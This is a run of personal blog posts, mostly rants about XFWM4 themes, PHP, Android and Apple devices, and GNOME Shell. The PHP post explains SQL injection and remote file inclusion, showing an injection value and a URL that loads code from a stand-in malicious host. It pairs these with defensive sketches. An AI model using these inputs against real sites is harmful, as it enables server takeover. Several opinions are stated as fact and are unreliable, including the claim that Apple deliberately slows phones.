But surprisingly, I'm not going to direct my rant toward GTK+ themes. Everybody who's ever used Linux knows that 99% of the crap on gnome-look.org isn't worth using. I've very rarely used a GTK+ theme that correctly solves the problem of, "your panel background image tiles across the shutdown dialog so you can't read the text of the dialog," but I digress.

No, this is about XFCE window manager themes. Themes for XFWM4.

XFWM4's themes are quite simple, or at least if you're making a flat pixmap theme they are. All you need to do is have a folder full of XPM files with certain file names, and XFWM4 does the rest. It's easy! So why does everybody screw this up?

The window manager theme I wanted on XFCE most recently was Clearlooks. Yes, the standard Metacity theme that comes with every single GNOME based distribution ever. I wanted it on XFCE, but couldn't find a good version of an XFWM4 theme for it that didn't suck.

I found one that got kind of close. Clearlooks-Xfce-Colors, in fact. It looks good, except he made a mistake putting the theme together: the maximize/restore button behavior is broken. Apparently, he couldn't figure out how XFWM4 handles the "Restore" button on a maximized window. So, for the active focused window, the "Maximize/Restore" button will always use Maximize, and every inactive window will always use Restore instead.

So for the active window, there's NO way of telling whether it's maximized or not, because the button always shows the exact same icon. Same goes for inactive windows.

The official XFWM4 theme how-to explains how this works. You just need file names like "maximize-toggled-active.xpm" or "maximize-toggled-inactive.xpm". That's it. Now your "Restore" button works fine.
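Checking a theme for this mistake is easy to automate. The following is a minimal sketch in Python, not part of XFWM4 itself: it only knows about the two file names mentioned above, and the function names are made up for illustration.

```python
from pathlib import Path

# The two file names come from the paragraph above; a real theme contains
# many more images, which this sketch deliberately ignores.
RESTORE_IMAGES = ("maximize-toggled-active.xpm", "maximize-toggled-inactive.xpm")


def missing_restore_images(file_names):
    """Return the "Restore" button images that are absent from a theme."""
    present = set(file_names)
    return [name for name in RESTORE_IMAGES if name not in present]


def check_theme_dir(theme_dir):
    """Run the same check against the files in a theme folder on disk."""
    return missing_restore_images(p.name for p in Path(theme_dir).iterdir())


if __name__ == "__main__":
    # A theme that only ships the plain maximize images, like the broken one above.
    broken_theme = ["maximize-active.xpm", "maximize-inactive.xpm", "close-active.xpm"]
    print(missing_restore_images(broken_theme))
```

An empty list means both "Restore" images are present; anything else is the list of files the theme author forgot.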

Another common problem I've seen. Take for example the Vista Basic theme here. It looks good in the screenshots, yes? That's because the title is centered.

When you uncenter the title, or even just have a narrow window open (my Pidgin buddy list for example), huge problems with the theme become apparent. If you left-align the title, there's a huge margin (in the realm of 60 pixels) on the left of the title. WTF? And on a narrow window like Pidgin's buddy list, the title will be completely devoured by the margins to the point you can't see the title anymore.

Why is this? XFWM4 themes have five different title images, appropriately named "title-1-active.xpm" through "title-5-active.xpm". These five images make up the title bar. If title-1 is 60 pixels wide, your title will have a 60 pixel margin on the left. So, make your title images as thin as you possibly can (4 pixels is great) unless you explicitly need to do something fancy with your titles.
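An XPM file is plain text, and its first quoted string holds the width and height, so spotting an overly wide title image doesn't require an image editor. Here is a rough sketch in Python; the 4 pixel threshold is just the rule of thumb from above, and the function names and sample data are invented for the example.

```python
import re


def xpm_size(xpm_text):
    """Return (width, height) from the values line of an XPM3 file.

    The values line is the first quoted string and starts with
    "width height ncolors chars_per_pixel".
    """
    match = re.search(r'"\s*(\d+)\s+(\d+)\s+\d+\s+\d+', xpm_text)
    if match is None:
        raise ValueError("no XPM values line found")
    return int(match.group(1)), int(match.group(2))


def too_wide(xpm_text, max_width=4):
    """True if the image is wider than max_width pixels (assumed threshold)."""
    width, _height = xpm_size(xpm_text)
    return width > max_width


# Made-up stand-in for a title-1-active.xpm that is 4 pixels wide, 2 tall.
SAMPLE = '''/* XPM */
static char *title_1_active[] = {
"4 2 1 1",
". c #3A6EA5",
"....",
"...."};
'''

if __name__ == "__main__":
    print(xpm_size(SAMPLE), too_wide(SAMPLE))
```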

I have never once installed a third party XFWM4 theme that has been high enough quality. The usual procedure when I really want a certain style is: find one that's close, find out it fails super hard because the creator is a complete noob and didn't even bother to read the official documentation before making his theme, and then either try to hack it until it works OR just scrap it and create my own from scratch. And then re-release the theme back to xfce-look.org for others to use.

So, here are my better copies of various window manager themes for XFWM4:

End of rant. Now, about those GTK+ themes...

In short: PHP has a tendency to be vulnerable-as-a-default, the barrier to entry is so low that every noob who barely just learned HTML can already begin writing dangerous code, even the largest web apps in PHP have gaping security holes, and I consider PHP itself to be just an elaborate content management system more than a real programming language.

To break down each of those points:

The last time I made a solid effort to learn to code in PHP, I came to realize that the default php.ini on my system had some rather stupid options turned on by default. For instance, the include() statement would be allowed to include PHP code from a remote URL beginning with "http://". It's things like this that make PHP insecure as a default. I have now learned to carefully comb through my php.ini before installing any PHP web apps on a new server, just to make sure no stupid defaults are enabled that will leave my server vulnerable.

The barrier to entry is so low in PHP that people who have no business writing program code are given the tools to do so. A good friend of mine does freelance web security consulting and says that a large majority of the PHP-powered sites he's come across have been vulnerable to SQL injection. He attributes this to the fact that many PHP tutorial sites don't mention SQL injection when they get to the chapter about databases. They'll recommend that you just interpolate variables directly into your SQL queries.

Case in point: the very first result for Googling "php mysql tutorial" that isn't from php.net is this link: PHP/MySQL Tutorial - Part 1. When this tutorial gets to the insertion part, it recommends you just formulate a query like this:

SELECT * FROM contacts WHERE id='$id'

And this:

SELECT * FROM tablename WHERE fieldname LIKE '%$string%'

Coding practices like this will cause you a lot of pain in the future. I'm not a PHP tutorial site so I won't even bother to explain how to avoid SQL injection in PHP. I won't use any of your code on my server so your own stupidity will be your own downfall, and it won't be my problem.
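The underlying problem isn't specific to PHP, though, and it's easy to demonstrate elsewhere. The following is a minimal sketch using Python's built-in sqlite3 module rather than PHP and MySQL: the "contacts" table and "id" column mirror the tutorial's query, while the "name" column, the sample rows and the function names are made up for the example.

```python
import sqlite3


def make_db():
    """Build a throwaway in-memory database with two contacts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contacts (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO contacts VALUES (?, ?)",
                     [("1", "alice"), ("2", "bob")])
    return conn


def find_unsafe(conn, contact_id):
    # Interpolation, as in the tutorial's query: the input becomes part of
    # the SQL text, so a quote character in it can rewrite the query.
    query = "SELECT name FROM contacts WHERE id='%s'" % contact_id
    return [row[0] for row in conn.execute(query)]


def find_safe(conn, contact_id):
    # Placeholder binding: the input is only ever treated as a value.
    rows = conn.execute("SELECT name FROM contacts WHERE id=?", (contact_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = make_db()
    evil = "x' OR '1'='1"
    print(sorted(find_unsafe(conn, evil)))  # every contact leaks
    print(find_safe(conn, evil))            # no contact has that id
```

With the interpolated query, the malicious input turns the WHERE clause into one that matches every row; with the placeholder, it is compared as an ordinary (and non-matching) id.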

As an example of a large PHP web app having gaping wide security holes, just read about how my server got hacked through phpMyAdmin. In short, there was a PHP script in the "setup" folder that ended with a .inc.php file extension (indicating it was meant to be included and not requested directly over HTTP), and it would execute system commands using data provided by the query string. In that blog post I ranted about how I hate PHP even more because of this, and about how in Perl this sort of thing wouldn't even happen, because an included script would have to go out of its way to read the query string; it wouldn't just use the query string "by accident" like PHP scripts are apt to do.

SQL injection is one of THE most popular attack vectors for anything written in PHP, but if I ever hear about a PHP exploit besides that, it is almost invariably this: somebody fooled a PHP script into including PHP source from a remote domain. Example:

Your site has URLs that look like this, http://example.com/?p=home

And your "index.php" there will take "p=home" and include "home.php" to show you the home page. Okay, what about this then?

http://example.com/?p=http://malicious.com/pwned.php

And your index.php includes pwned.php from that malicious looking URL and now a hacker can run literally any code they like on your server. I've witnessed sites being pwned by this more times than I care to count, oftentimes because the php.ini was misconfigured as a default.
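The usual defense is to never turn the "p" parameter into a file name directly, and instead look it up in a fixed list of known pages. Here is a rough sketch of that idea in Python (standing in for index.php); the page list and the function name are hypothetical.

```python
# Hypothetical list of pages the site actually has.
ALLOWED_PAGES = {
    "home": "home.php",
    "about": "about.php",
}


def resolve_page(p, default="home"):
    """Map the ?p= value to a local file name.

    Anything that is not a key in ALLOWED_PAGES, such as a remote URL or a
    path with "../" in it, falls back to the default page.
    """
    return ALLOWED_PAGES.get(p, ALLOWED_PAGES[default])


if __name__ == "__main__":
    print(resolve_page("home"))
    print(resolve_page("http://malicious.com/pwned.php"))
```

Because the user's input is only ever used as a dictionary key, it never reaches the code that opens or includes a file.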

Moving on to the last point, I don't consider PHP to be a real programming language. It is more like a web framework, like Drupal or MovableType or Catalyst, that is packed full of tools specifically geared towards the web. PHP has thousands of built-in functions for everything a web app could imagine needing to do, from MySQL to CGI. The web page "PHP in contrast to Perl" sums up all of the problems with PHP's vast array of global functions. They're inconsistently named and many of them do extremely similar things.

Contrast that to Perl, where the core language only provides the functions you would expect from a real programming language, and to do anything "cool" you'll need to include modules which provide you with more functionality. PHP fans often say it's a good thing that PHP has MySQL support built right in, but then I point them to the functions mysql_escape_string and mysql_real_escape_string. What is with that? Was the first function not good enough, that somebody had to write a second one that escapes strings better? And they had to create a second function so they don't break existing code that relies on the behavior of the first?

In Perl, if I was using the DBI module for SQL, and I had a problem with the way that DBI escapes my strings, guess what I could do: I could write my own module that either inherits (and overrides) from DBI, or write a new module from scratch with an interface very similar to DBI, and use it in my code. My code could still be written the exact same way:

my $dbh = Kirsle::DBI->connect("...");

my $sth = $dbh->prepare("INSERT INTO users SET name=?, password=?");

$sth->execute($username,$password);

Besides the "programming language" itself, just take a look inside php.ini. What's that, you ask? It's a global PHP configuration file. Yeah, that's right: the behavior of every PHP script on your entire server can be dictated by a single configuration script. Aren't config files supposed to be a part of, oh I don't know, applications? Content management systems? And not as part of a programming language itself?

On one hand this explains why a lot of free web hosts allow you to use PHP but not Perl; PHP can be neutered and have all of its potentially risky functionality taken away by carefully crafting your php.ini whereas Perl, being a REAL programming language, can't be controlled any more easily than a C binary can. But on the other hand, just look inside php.ini -- there are options in there for how PHP can send e-mails, and how it would connect to a database by default. It even breaks down the databases by type - MySQL, PostgreSQL, MSSQL, etc. Shouldn't database details be left up to the actual PHP code? Apparently not.

So there you have it. I'll never use PHP. It's not even a real programming language. Just a toolkit for rapidly getting a website up and running. What's another name for that? Oh, a Content Management System. Doesn't a PHP CMS sound redundant now? ;)

My ttf2eot tool is a converter tool only; it does not host your EOT font files. Do not hotlink directly to the files on my server. The files only remain for up to 24 hours and then are deleted. If you hotlink to a deleted font, you will get the Sabrina font instead, which most likely isn't what you want.

What it really means from what I've read is that Google is just not selling the phone themselves directly but it can still be obtained via other means (developers can still buy them and they're still being sold in other countries), but that Google still intends to support the phone for the foreseeable future -- it will still be the first in line to get Android updates, for example.

I have a Nexus One and I like it and this news is a bit worrisome to me, but not in the way you might expect. Rather, because the Nexus One is one of the few Android phones that is truly open.

Apparently, the very first Android phone (the G1), the first Droid, and the Nexus One are pretty much the only Android phones that ship with the stock, vanilla, Android firmware. All the other HTC phones out there for example run the "HTC Sense" UI on top of Android, and the Motorola phones run the "Motoblur" UI; some people don't like these add-ons on top of Android and would rather run Android the way Google intended, using the stock vanilla release of the ROM. Or, some people just like to hack their phones and have root access on them.

The Nexus One phone made it really easy to unlock your bootloader and install custom/unsigned Android ROMs onto the phone if you wanted to (it would even provide a nice screen warning you that you're about to void your warranty). The Nexus One allows you to install whatever you want on it, and both Google and the phone itself fully support this. But other phones aren't so open, notably the Motorola phones that come with an eFuse that will practically "brick" your phone if you try to modify its firmware.

There seems to be a trend in Android phones in which companies are trying to play Apple; Apple's iPhone devices are super locked down, and Apple tries to patch all the security holes to stop people from jailbreaking their devices - with each firmware release Apple tries to make it harder and harder to hack the iPhones. In Apple's ideal world, their hardware would be completely 100% impenetrable from hackers and nobody could modify their devices. It seems Android vendors want to copy this business model, which I for one do not like.

It seems Android vendors are "standing on the shoulders of giants": they look at Android and all they see is a free open source Linux-based mobile operating system, and they wanna just take all that hard work, add a few things to make their devices a major pain in the ass to hack (in their ideal world, absolutely impossible to hack) and then jerk their customers around in exactly the same way that Apple does. Is this really what Android was supposed to be all about? Just giving greedy megacorporations the cheap tools they need to strongarm part of the cell phone monopoly in their favor?

Hopefully the Nexus One won't be the last developer phone that can be bought by non-developers. I got mine specifically because it ran the stock unmodified Android firmware and because it was completely open to customization. As I ranted about before, I don't like how Apple is able to just slow down your old phones and force you to upgrade; at least I have the comfort of knowing I can easily flash any Android ROM onto my Nexus One and nobody can force me to upgrade by slowing my phone down or doing anything else malicious to it.

God help us if this is the future and we're stuck with many Apple-like companies all forcing us to use their locked-down devices that we're not allowed to touch at all for fear of permanently bricking our devices.

I didn't care one way or another about Apple until I got an iPhone 3G about a year ago. I got it about a month before the iPhone 3GS model came out; I heard the 3GS was on its way but nobody knew when, but I figured, "a smartphone is a smartphone, who really cares if mine doesn't have a compass built in?" How wrong I was.

I didn't know then what Apple was planning to do in the following month. Basically, they release the 3.0 firmware upgrade for iPhone 3G users. The new firmware gives the 3G customers a taste of some of the new features and would encourage them to buy the upcoming 3GS phone to get the rest. But, one more thing, the 3.0 firmware slows your shit down! So, the customers who were fine with the 3G and didn't plan to upgrade to the 3GS, now, would probably want to buy the 3GS just because they get sick of the 3G being so slow.

If you take an iPhone 3G running the 2.x firmware and compare it side-by-side with the 3GS phone running the 3.0 firmware... the difference in speed and "snappiness" is negligible.

So basically, the 3G was slowed down, on purpose, and then when the Apple fanboys stopped complaining and got used to this new slowness... Apple releases the iPhone 3GS and "ohh my godd, it's SO fast and snappy!"

I've been telling everyone my prediction for the last year but now I'm writing it for my blog: my prediction is that this upcoming summer 2010, Apple will release the 4.0 iPhone OS firmware upgrade, which will slow down all the 3GS phones (currently Apple's latest iPhone model), and then this will be followed a week or two later by Apple unveiling the iPhone 4, which will be OH-SO-FAST now compared to the crippled, slowed-down 3GS phones.

Let's just wait and see if I'm right.

For this reason, my iPhone 3G is the first, and last, Apple product I ever intend to own. Well, the only closed device, anyway; I do like the Mac OS X operating system, and with a Macbook you can always reinstall the operating system from the CD that came with your computer. But with locked-down devices, once you make the mistake of upgrading, you can't go back; modern iTunes versions make sure of this: when you try to restore your devices in iTunes now, iTunes insists on getting the very latest firmware from Apple and doesn't let you browse and choose an older firmware image.

Because of the way Apple abuses their iPhone and iPod Touch customers, you'd better believe they'll pull the same shit with iPad customers too. I hope all you iPad early adopters love your iPad now, but just wait: approximately a year from now there will inevitably be a new model, and Apple will really want to slow your shit down to force you to either deal with the artificial slowness, or pay another $500+ to upgrade to the latest model.

So I'm not a fan of Apple's closed devices. But I'm also not a fan of Apple's policies in terms of their app store approvals and rejections.

It was all over the blogosphere when Apple banned the Google Voice application from the app store; the ban even prompted an FCC investigation into whether Apple had any legal right to do so. Why did Apple ban Google Voice? Because it competed with Apple's very own phone application.

Similarly, there have been other apps Apple has killed because Apple is anti-competitive, including an e-mail app that was better than Apple's built-in e-mail app. Apple likes to maintain a complete monopoly--nay, a dictatorship--over its app store, and it would rather completely exterminate any hint of competition than to actually, you know, compete back. If somebody made an e-mail app that kicks the ass of Apple's e-mail app, Apple should make their e-mail app better than the competition; it shouldn't just throw a bitchfit and say "BAWWWWW this app isn't approved for the app store!"

Apple, in this regard, comes off to me as being like an immature little child, who would rather throw the chess board on the floor and scatter all the pieces than to even think about dealing with any form of competition whatsoever.

In the "App Store Competition" boat also sits Adobe Flash. It's highly speculated that the real reason Apple has a vendetta against Flash is because Flash applications can be just as feature-rich, interactive and animated as native iPhone applications. If Mobile Safari had a Flash player, nothing would stop people from creating web applications consisting of a Flash object that users could bookmark as Home Screen icons and that would be just as full-featured as native iPhone applications.

Similarly, Apple's latest developer agreement says you must originally write your app in C, C++ or Objective-C. Why did Apple decide to add this clause just now? Because Adobe's latest Flash beta includes the capability to export your Flash application into Objective-C code, which would enable one to basically use Adobe Flash to create iPhone applications.

Apple hates Flash for one reason: it directly competes with the app store and the native iPhone applications. If you could use Flash to create Objective-C code to author iPhone applications, Apple may lose some market share since Mac OS X is no longer required to create iPhone apps, among other things.

Anyway, this is where I stand on my views about Apple. Frankly, Apple is evil, in the sense of the term as it is used in Google's company slogan, "Don't be evil." Apple is this kind of evil.

So, I have no plans to ever own another closed Apple device, and would never consider developing an iPhone application. Nothing could be worse than spending weeks or months developing an application, only to have Apple dictate at the last minute that your app won't be allowed on the app store.

When I get an Android, I'll do Android app development. It has a plus of being Java-based. This means if I decided to make, say, a game, I could program the game once and then very trivially make many different ports of it: a desktop application, "full version" of the game; a Java applet, "try online before you download" light version of the game; and an Android application, "mobile version" of the game.

I know Apple fanboys like to google for anyone talking shit about Apple and I welcome the comments. I just know however from speaking with Apple fanboys I know in real life that they all were fully aware that Apple slows down their old devices (a co-worker fanboy has an iPhone 3G and agreed that it was slowed down with the 3.0 firmware). But, as expected of Apple fanboys, they try to justify it and defend Apple even though Apple is blatantly screwing them over and extorting them for as much money as possible. But by all means, post your comments anyway; entertain me with your blind dedication to Apple and how you believe they could do no wrong.

Because from where I stand, holding my iPhone 3G that takes 40 seconds to load the SMS app from a sleep state (and you 3G users know exactly what I'm talking about), Apple is doing nothing good here.

One example of an important feature that was removed at the whim of a developer: in the GNOME desktop environment, you used to be able to set which mount options GNOME used when it auto-mounted a flash drive or external hard drive that you plugged in.

The default mount options include, among other things, the shortname=lower option for FAT32 volumes. What this means is that, if you have a file on the FAT32 hard drive that fits within the 8.3 filename format of DOS, and the file name is all uppercase, it is displayed in Linux as all lowercase.

I used to (used to!) back up all my websites to a FAT32 hard drive, and I have a folder titled "PCCC" -- all uppercase, and short enough to fit the 8.3 format. The default mount options would have Linux display this to me as "pccc" -- all lowercase. When restoring from a backup, then, my site would give 404 errors all over my Perl CyanChat Client page, because Linux is case-sensitive and "pccc" is not the same as "PCCC."
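To make the effect concrete, here is a simplified model in Python of the display rule described above. It is only an illustration of the behavior as described in this post, not the kernel's actual FAT code: the 8.3 test is rough (it ignores which characters FAT really allows) and the function name is made up.

```python
import re

# Rough 8.3 test: 1 to 8 characters, optionally a dot plus 1 to 3 more.
# Assumption: real FAT short names also restrict the legal characters.
_SHORT_NAME = re.compile(r"^[^.]{1,8}(\.[^.]{1,3})?$")


def displayed_name(stored_name, shortname="lower"):
    """Return how a stored FAT32 name would be shown under this model.

    With shortname="lower", an all-uppercase name that fits 8.3 is shown in
    lowercase; every other name, and every name under "mixed", is shown as
    stored.
    """
    fits_8_3 = bool(_SHORT_NAME.match(stored_name))
    all_upper = stored_name == stored_name.upper()
    if shortname == "lower" and fits_8_3 and all_upper:
        return stored_name.lower()
    return stored_name


if __name__ == "__main__":
    print(displayed_name("PCCC"))                     # the folder from above
    print(displayed_name("PCCC", shortname="mixed"))  # the option I want
```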

It used to be as simple as editing the GNOME gconf key and changing this mount option. But as of Fedora 11 or so, changing the mount options in gconf has no effect. After researching, it turns out that Fedora 11 decided to switch from HAL to DeviceKit to manage the automatic mounting of flash drives. And, DeviceKit doesn't pay any attention to your gconf options.

And, to make it much worse, DeviceKit has the mount options for FAT32 and other filesystems hard coded into the binary itself. So for me to set the shortname=mixed mount option I want for FAT32 drives, I have to download the source code for DeviceKit, find where the mount options were hard-coded into the source, change them there, and compile my own custom version of DeviceKit. This is ridiculous.

Googling as to why in the world this is, I found comments from developers very similar to the one on this bug ticket that goes like this (emphasis mine):

"The other part of this bug a discussion of whether exposing mount options to end users is an useful thing to do. My view is that it is not. So the replacement for gnome-mount/HAL, namely gvfs/DeviceKit-disks, will not support that."

Excuse me? I'm sure I cannot be the only person in the world who finds it useful to be able to change the mount options.

As a result of this, I have to edit /etc/fstab and add entries for my permanent external hard drives (FAT32) to get them to use the mount options I need. What is this, 1999 again? We shouldn't have to touch fstab nowadays.
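For reference, an fstab entry is just six whitespace-separated fields: device, mount point, filesystem type, options, dump flag and fsck pass. The sketch below builds one in Python; the UUID and mount point are placeholders, the extra "noauto" and "user" options are only examples, and the helper assumes neither the device nor the mount point contains spaces.

```python
def fstab_line(device, mount_point, options, fs_type="vfat"):
    """Format one /etc/fstab entry.

    Fields: device, mount point, filesystem type, comma-separated options,
    dump flag (0) and fsck pass (0).
    """
    return "%s %s %s %s 0 0" % (device, mount_point, fs_type, ",".join(options))


if __name__ == "__main__":
    # Placeholder UUID and mount point; substitute the real drive's values.
    print(fstab_line("UUID=1234-ABCD", "/media/backup",
                     ["shortname=mixed", "noauto", "user"]))
```

The part that matters here is shortname=mixed in the options field; everything else depends on the drive and on how you want it mounted.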

Another example: GNOME 3.0 and GNOME Shell. I have ranted about this several different times now. I'm not against innovation, but I am for backwards compatibility. Intentionally developing a desktop environment that is supposed to replace one as ubiquitous as GNOME 2.x and having it require very powerful graphics hardware, with no fallback for less capable systems, is not a good idea.

One more example (kinda nitpicky, really): in the 4.4 release of the XFCE desktop environment, the window list panel applet used to support automatically grouping all windows of the same application into a single button, and an option to display only the icon of the application and not the window's title. See where I'm heading with this? Long before Windows 7 was even out, XFCE's panel could emulate the behavior of Windows 7's new taskbar. The feature is completely missing from XFCE 4.6 however, probably because the one developer who manages the panel applet decided by himself that nobody, anywhere, uses that feature and he removed it.

This arrogance by open source developers makes me worry about other projects. In the XFWM4 window manager used by XFCE, you can currently double-click on the menu icon in the title bar and that will close the window, similar to the behavior of Windows as far back as Windows 3.0 (at least). I haven't seen any other X11 window manager that supports double-click-to-close like this (Metacity and Emerald for sure don't support this).

I rather like the double-click-to-close feature, but I'm afraid it will just up and disappear one day because this feature is very poorly documented and the developer may one day decide that nobody uses that feature and delete it from the code. I use that feature! Don't delete it!

Because of things like this, I find myself more and more thinking of just creating my own desktop environment. Yes, a whole entire desktop environment: panels, window managers, everything. I've seen a few Perl-powered desktop environment features that I bookmarked so I can dissect them later. Like, I'm a big fan of the XFWM4 window manager, but I'm not a C or C++ programmer and wouldn't know where to begin if I wanted to fork XFWM4 as my own project. Thus I would write my own window manager in Perl, program in the features that I really like, and maintain it on my own, so that I won't ever lose a feature suddenly just because some arrogant programmer somewhere decided without consultation that the feature is useless.

Ah well... you get what you pay for, I guess.</rant>

This is a sequel to my rant about GNOME Shell. I decided to back up my claims with an experiment.

Installing gnome-shell in a virtual machine with no 3D hardware acceleration.

Every single desktop environment that exists right now will run just fine in a virtual machine with no 3D hardware acceleration: XFCE 4.6 and older; KDE 4.3 and older; KDE 3.x and older; GNOME 2.26.3 and older; LXDE; and of course all of the desktop-less window managers (IceWM, et cetera).

GNOME 3.0, I claimed, with its GNOME Shell, will be the first desktop environment that will not run unless the user has 3D hardware acceleration, and that there is no fall-back. Here is the proof:

* Fedora 12 Alpha (11.92 Rawhide)

* VirtualBox 3.0.6 r52128 (2009-09-09)

Let's launch it!

And... what happens?

Basically, my screen is mostly black; I can't see any of my windows. I can see only a little bit of the GNOME Shell interface.

Let's put on the dumb end user hat and say Joe Average installed Ubuntu 10.10, which might come with GNOME 3.0 and GNOME Shell. He hasn't installed his nvidia drivers yet because they're proprietary and Canonical can't legally include them with Ubuntu, so he logs on and sees THIS. He's lucky that X11 didn't crash entirely and send him back to the login screen, but nonetheless he can't see anything. He can't see Firefox to start browsing the web trying to find a solution to this problem.

Okay, let's move on...

Exactly the same.

I won't post screenshots because they look just like they did the last time. I get a mostly black, unusable desktop.

Of note however is that the terminal printed this upon starting the GNOME Shell:

OpenGL Warning: Failed to connect to host. Make sure 3D acceleration is enabled for this VM.

VirtualBox knows GNOME Shell was requesting 3D support via OpenGL, and the guest additions driver gave me this warning. Let's move on...

I've personally not used it. But it is known to be buggy; VirtualBox labels it as "experimental"... well, here's why:

In this experiment, even with 3D acceleration by the virtual machine, GNOME Shell is not usable. Again, though, VirtualBox's 3D acceleration is still in the "experimental" phase. It probably doesn't work a whole lot better with Compiz Fusion, either. Plus my video card might just suck (VirtualBox basically passes the guest's OpenGL calls directly to the host's video card).

But the thing to take away from this is:

Now let's see if the GNOME dev team can turn this around in the next year (doubtful; they all come off to me as a bunch of eye-candy-obsessed children who'd rather snazz up the desktop because they think it's "cool" than to worry about things like usability, functionality, or accessibility... and with absolutely no thought given to the user experience, and no usability studies done, etc.).

GNOME Shell for the lose.

Half a year ago the roadmap for GNOME 3.0 was announced, and it involves a new window manager called GNOME Shell. They plan to have GNOME 3.0 ready for public consumption in 2010, around the release of Fedora 13. I tested the GNOME Shell back then and it was awful; since then, it hasn't improved a lot, either. And I'm not optimistic about where it's headed; I think GNOME 3.0 is going to be a terrible, terrible mistake.

If you aren't aware, GNOME is a desktop environment for Unix, and is the default desktop environment for both Fedora and Ubuntu. The other major desktop environments are KDE and Xfce.

GNOME has been said to resemble Windows 98 - true, its default theme is pretty gray and boring, but GNOME is flexible enough that it can be made to look just like OS X or Vista or anything else.

The KDE desktop environment looks an awful lot like Windows as well. KDE jumped from versions 3.x up to 4.0 about a year ago, and KDE 4.0 looks a lot like Windows 7. But on the whole, the desktop still looks and acts the same; KDE's version jump was a natural evolution of its desktop, not a complete change to something completely new and unfamiliar.

GNOME, not wanting to be 1-upped by KDE's version jump, decided they'd bump GNOME 2.x up to version 3.0 -- and entirely redefine the desktop metaphor while they're at it. GNOME 3.0 with its GNOME Shell has almost nothing at all in common with GNOME 2.x.

Here is a relatively recent article about GNOME Shell, so you can take a look.

But that's not why I dislike it. I just thought I'd give some background first. This is why I dislike it:

GNOME Shell requires 3D hardware acceleration. What? Let's compare the current desktop environments: Xfce 4.6 and older, KDE 3.x and older, KDE 4.0, and GNOME 2.x and older... all of these desktops can be run on bare minimal video hardware. You know how Windows Vista, and Windows 7, have "Basic" themes? If you run Vista or 7 on a computer that either doesn't have a kickass video card, or you simply just don't have the drivers installed yet, you get to use the "Windows Basic" theme. Windows has a fall-back for when Aero can't run.

But GNOME 3.0 will have NO such fallback. If your video card sucks, or you don't have the drivers, you can't use GNOME 3.0 at all. What will you see? You'll see the X11 server crash and leave you at a text-mode prompt. You will have NO graphical user interface at all; you'll be stuck in text-only mode, because your video card must be kickass for GNOME Shell to load.
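A fall-back of the kind Windows has doesn't need to be complicated in principle. The following is a rough sketch in Python, and in no way how GNOME actually starts a session: it assumes the "direct rendering" line printed by glxinfo is a good enough signal (a crude heuristic), and the session names are made-up labels.

```python
def has_direct_rendering(glxinfo_output):
    """True if the glxinfo text contains a 'direct rendering: Yes' line."""
    for line in glxinfo_output.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "direct rendering":
            return value.strip().lower().startswith("yes")
    # No such line at all (glxinfo failed, for example): assume no 3D.
    return False


def choose_session(glxinfo_output):
    """Pick a desktop session; both names are hypothetical labels."""
    if has_direct_rendering(glxinfo_output):
        return "gnome-shell"
    return "gnome-2-fallback"


if __name__ == "__main__":
    print(choose_session("name of display: :0\ndirect rendering: Yes\n"))
    print(choose_session("name of display: :0\ndirect rendering: No\n"))
```

The point is only that the decision can be made before the 3D desktop is launched, so the user lands in something usable either way.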

Most people have ATI or Nvidia cards, you say? Well, it's well known that ATI and Nvidia have proprietary, closed-source drivers; the companies simply refuse to open up their video drivers as free software. And because Linux is a free and open source operating system released under the GNU General Public License, Linux isn't legally allowed to include ATI or Nvidia drivers "out-of-the-box."

So, when you pop in your Ubuntu or Fedora CD to install it on your computer, the installed operating system can not legally contain Nvidia or ATI drivers. Without the drivers, your video card can't do 3D acceleration. If you were on Windows Vista or 7, you would see the Windows Basic theme; if you're on Linux with GNOME 3.0, you'll see NOTHING! You'll be at a text-mode login prompt, and when you log in, you'll be at a text-mode bash prompt. No graphics, no windows, nothing but text.

This wouldn't be the end of the world for me personally, but then again I know a great deal about Linux. I would be able to install third-party software repositories and install the Nvidia or ATI drivers all at the command line; or at least I would know how to install an alternate desktop environment such as Xfce so that I could get a GUI and then fix the video problem manually. But the average user, or newbie to Linux? They'll be stuck.

I'm curious to see how Canonical (the company behind Ubuntu) is going to deal with this. Are they going to stick it out with GNOME 2.x and ignore GNOME 3.0? I imagine that's quite a likely scenario. Because consider this:

Ubuntu is known as the newbie-friendly Linux distro. It's the easiest one to get set up and running, it's easy to use, and when you log in for the first time it even asks you if you'd like to install some proprietary hardware drivers. Ubuntu can't legally install these automatically but it makes it easy for the user to install them afterward.

What if Ubuntu upgrades to GNOME 3.0, a new user installs it on their computer, and the new user can't even get the desktop to load? They have an ATI card and they don't have the drivers installed, and therefore GNOME 3.0 absolutely will not start because it absolutely requires hardware acceleration. They're a complete newbie to Linux, they know nothing about the command line, but they're stuck at a text-mode prompt. Know what they'll do? They'll switch back to Windows and never be fooled again when somebody wants them to give Linux a try!

Of lesser importance: by reinventing the wheel, the GNOME developers are basically starting over almost from scratch. This means that some of the more complicated problems that the GNOME dev team have tackled in the past may come back. Dual monitor support, for example. The jump to 3.0 is quite likely going to be a large step backwards for the GNOME desktop environment.

I am not a fan of where GNOME is heading. And if the GNOME dev team end up fscking this all up in the end, I'll just be forced to use a different desktop environment. Although, I really don't want to have to resort to that...

I love GNOME 2.x. I cannot stand KDE. KDE is just completely annoying to use. Xfce isn't too bad; it shares a lot in common with GNOME (they both use the GTK+ GUI toolkit)... but Xfce feels far behind GNOME 2.x. It feels clunky and old-school, and it lacks certain features that GNOME 2 has, such as integrated dual monitor support. For dual monitors in Xfce you'll have to resort to Nvidia's config tool (if you have an Nvidia card); otherwise you're screwed.

Xfce still has a year to get better, and GNOME 3 still has a year to not completely suck in the end. If GNOME 3 sucks and Xfce is still so clunky, I may even just be forced to abandon the Linux desktop altogether and go back to Windows. :(

Take a lesson from Windows (and literally every single desktop environment in Linux), GNOME 3.0: don't make 3D acceleration an absolute requirement, and include a fallback version for basic video drivers. Otherwise a really good chunk of your user base will move on to other desktops, or move back to Windows. And if you keep this up, Canonical and Red Hat may even just have to drop you completely as the default desktop environment in their distros, for making life too complicated for the end users.

I compared the settings between this monitor and the Hanns-G... the Hanns-G has 100 for brightness/contrast and for R/G/B; the Dell has 67 for brightness/contrast, and maxing them out whitewashes the entire image and makes the contrast even more horrible. So I've come to the conclusion that probably all Dell monitors have this issue, and I don't think I'll ever buy one for personal use.

